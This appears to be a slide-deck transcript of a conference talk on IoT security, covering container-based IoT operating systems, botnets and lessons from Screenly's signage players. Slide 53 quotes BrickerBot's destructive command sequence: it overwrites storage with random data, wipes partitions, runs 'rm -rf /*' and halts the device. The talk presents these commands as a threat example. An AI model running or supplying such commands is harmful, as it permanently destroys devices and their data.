The 'S' in IoT Stands for Security (a.k.a. Internet of Shit)

Transcript

1. Internet of Shit
   The ”S” in “IoT” stands for ”Security”
   

   View Slide

2. I’m:
   - Andy
   - Dev-like
   - Sec-ish
   - Ops-y
   

   View Slide

3. View Slide

4. Viktor (@vpetersson)
   ● Entrepreneur, geek, tinkerer
   ● Mediocre developer
   ● OK-ish at DevOps
   ● Founder of Screenly (and a few
   other things)
   

   View Slide

5. Digital signage
   made easy
   

   View Slide

6. © xkcd
   The sad state of ”smart” devices
   

   View Slide

7. “The Internet of Things is a science
   project focused on creating the most
   complex way possible of turning the
   lights on.”
   @domguinard
   

   View Slide

8. View Slide

9. View Slide

10. View Slide

11. View Slide

12. View Slide

13. View Slide

14. View Slide

15. https://www.theregister.co.uk/2016/03/25/vnc_roulette/
    https://www.tomsguide.com/us/pictures-story/748-vnc-roulette-slideshow.html#s12
    

    View Slide

16. What This Talk is About
    ● IoT: The State of the Art
    ● How Containers Can Help
    ● Botnets and Brickerbots
    ● Building Better Devices
    

    View Slide

17. IoT: The State of the Art
    

    View Slide

18. https://www.wired.com/2016/08/jeep-hackers-return-high-speed-steering-acceleration-hacks/
    ●
    

    View Slide

19. http://money.cnn.com/2017/01/09/technology/fda-st-jude-cardiac-hack/
    

    View Slide

20. View Slide

21. View Slide

22. View Slide

23. View Slide

24. View Slide

25. View Slide

26. How We Think IoT Devices Run
    

    View Slide

27. How IoT Devices Actually Run
    

    View Slide

28. View Slide

29. Blockchain all da thingz!
    

    View Slide

30. Containers and IoT
    

    View Slide

31. Containers to the Rescue!
    Containers to the Rescue!
    

    View Slide

32. Modern IoT Operating Systems
    ( )
    

    View Slide

33. OS OTA Process Isolation State
    resin.io X X Stable
    Ubuntu Core X X Stable
    eliot X X Proof of Concept
    Mender X - Beta (?)
    ACRN - X Beta (?)
    

    View Slide

34. View Slide

35. View Slide

36. View Slide

37. View Slide

38. Container Oriented IoT
    Kernel
    Scheduler /
    Management
    App container
    

    View Slide

39. ● “git push master resin”
    ● Yocto based
    ● Application isolated
    ● Isolation tool: Balena
    

    View Slide

40. View Slide

41. View Slide

42. ● Alpha
    ● Heavily inspired by CoreOS / Kubernetes
    ● Isolation tool: Docker
    

    View Slide

43. View Slide

44. ● Smaller footprint than “Classic”
    ● Lots of “read-only”
    ● Interfaces, slots and plugs
    ● Snaps, Docker and LXD
    ● (Primary) Isolation tool: AppArmor
    

    View Slide

45. View Slide

46. - Untrusted Domain
    

    View Slide

47. - Untrusted Domain
    ● Restricted host filesystem access
    ● Restricted host APIs
    ● Restricted to application-specific user data
    ● More isolation than a rogue nation state
    

    View Slide

48. - Untrusted Domain
    ● Restricted host filesystem access
    ● Restricted host APIs
    ● Restricted to application-specific user data
    ● More isolation than a rogue nation state
    ● Possible GDPR compliance
    

    View Slide

49. - Trusted Domain
    ● Built from the Ubuntu archive
    ● Archive integrity guaranteed by package maintainers
    ● May or may not run confined
    ○ Access to resource or data in the user’s session
    ○ Limited system service access (DAC/capability/policy permitting)
    

    View Slide

50. - Trusted Domain
    https://developer.ubuntu.com/static/resources/ubuntu-core-16-security-whitepaper.pdf
    

    View Slide

51. https://www.networkworld.com/article/3128372/internet-of-things/ddos-at
    tacks-using-iot-devices-follow-the-manchurian-candidate-model.html
    

    View Slide

52. View Slide

53. # BrickerBot v3 device logic
    $ busybox cat /dev/urandom >/dev/mtdblock0 &
    $ busybox cat /dev/urandom >/dev/sda &
    $ busybox cat /dev/urandom >/dev/mtdblock10 &
    $ busybox cat /dev/urandom >/dev/mmc0 &
    $ busybox cat /dev/urandom >/dev/sdb &
    $ busybox cat /dev/urandom >/dev/ram0 &
    $ busybox cat /dev/urandom >/dev/mtd0 &
    $ busybox cat /dev/urandom >/dev/mtd1 &
    $ busybox cat /dev/urandom >/dev/mtdblock1 &
    $ busybox cat /dev/urandom >/dev/mtdblock2 &
    $ busybox cat /dev/urandom >/dev/mtdblock3 &
    $ fdisk -C 1 -H 1 -S1 /dev/mtd0
    w
    $ fdisk -C 1 -H 1 -S1 /dev/mtd1
    w
    $ fdisk -C 1 -H 1 -S1 /dev/sda
    w
    $ fdisk -C 1 -H 1 -S1 /dev/mtdblock0
    w
    $ route del default;iproute del default;ip route del default; rm -rf /* 2>/dev/null & sysctl -w
    net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1
    $ halt -n -f
    $ reboot
    

    View Slide

54. Defence Against the Dark Botnets
    

    View Slide

55. View Slide

56. View Slide

57. View Slide

58. View Slide

59. IPv6
    IPv6
    

    View Slide

60. IPv6
    

    View Slide

61. Building Better IoT Devices
    

    View Slide

62. http://www.ideaeconomics.org/guerracartoons/2015/2/11/race-to-the-bottom
    

    View Slide

63. Device life cycle
    

    View Slide

64. Common mistakes
    

    View Slide

65. Designing Better IoT Devices
    

    View Slide

66. Kubernetes? Istio? VirtualKubelet?
    

    View Slide

67. Azure IoT Edge Connector for Kubernetes
    https://github.com/Azure/iot-edge-virtual-kubelet-provider
    

    View Slide

68. Lessons learned from Screenly
    

    View Slide

69. Screenly 1 Player
    + + + +
    

    View Slide

70. Screenly 2 Player criteria
    ● Disk images built on CI
    ● Process isolation (perhaps using containers)
    ● Transactional updates (app and OS)
    ○ Automatic roll-back
    ● Not having to manage the OS layer ourselves
    ○ Must be locked down/Hardened by default
    ● Bonus: Cryptographically signed updates
    

    View Slide

71. Screenly 2 Player
    + +
    

    View Slide

72. Recap
    

    View Slide

73. Conclusion
    ● IoT security is an afterthought at best
    ● The new breed of containerised IoT platforms greatly enhance the update and
    security story
    ● We can fix life cycle and runtime security
    ● Patch your devices!
    

    View Slide

74. @sublimino
    @controlplaneio
    @vpetersson
    @screenlyapp
    

    View Slide